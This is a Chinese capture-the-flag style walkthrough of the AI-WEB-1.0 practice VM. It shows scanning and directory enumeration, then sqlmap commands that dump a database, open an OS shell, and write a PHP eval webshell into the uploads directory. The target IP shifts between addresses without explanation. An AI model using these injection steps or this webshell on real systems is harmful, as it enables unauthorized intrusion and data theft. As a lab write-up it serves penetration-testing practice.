AI-WEB-1.0获取shell

攻击机kali IP:192.168.48.130

靶机 AI-WEB-1.0 IP:?

信息收集

c段扫描

arp-scan

-l 扫描c段

这里可以分析到靶机IP:192.168.110.138

对靶机进一步扫描

对端口进行扫描

使用nmap -sV -v -T4 对靶机扫描

扫描发现只开放了80端口

对网页进一步扫描

访问没有什么信息

使用dirb 对网页进一步扫描

dirb "http://192.168.110.134/"

尝试发现robots.txt中有内容

访问发现/m3diNf0/不能正常访问

/se3reTdir777/uploads/ 不能访问页面

使用dirb 对/m3diNf0和/se3reTdir777扫描

发现是phpinfo的页面

再扫描se3reTdir777

dirb "http://192.168.110.134/se3reTdir777"

发现新的index.php 访问

发现是查询页面 考虑sql注入

输入’报错发现sql注入漏洞

漏洞利用

sqlmap的使用

这里利用burp抓包得到以下的包

通过抓包得到注入点uid=1&Operation=Submit

使用sqlmap

注入页面为http://192.168.110.134/se3reTdir777/index.php

注入点为uid=1&Operation=Submit

--dbs 列出数据库

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

得到了

aiweb1

information_schema 两个数据库

-D 指定数据库 aiweb1

--tables 列出表名

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

得到 user systemUser 两个表名

再通过-T 指定表名user

--columns 列出字段

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns 

得到 firstName id lastName 3个字段

再-C 指定字段 id

--dump 获取字段中的数据

sqlmap -u  "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

获取shell

sqlmap -u "http://192.168.48.134/se3reTdir777/" --data "uid=1&Operation=Submit"  --os-shell

选2自定义路径

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

连接成功

上传一句话木马

<?php @eval($_POST['zx'])?>

sqlmap -u "http://192.168.48.134/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

蚁剑连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值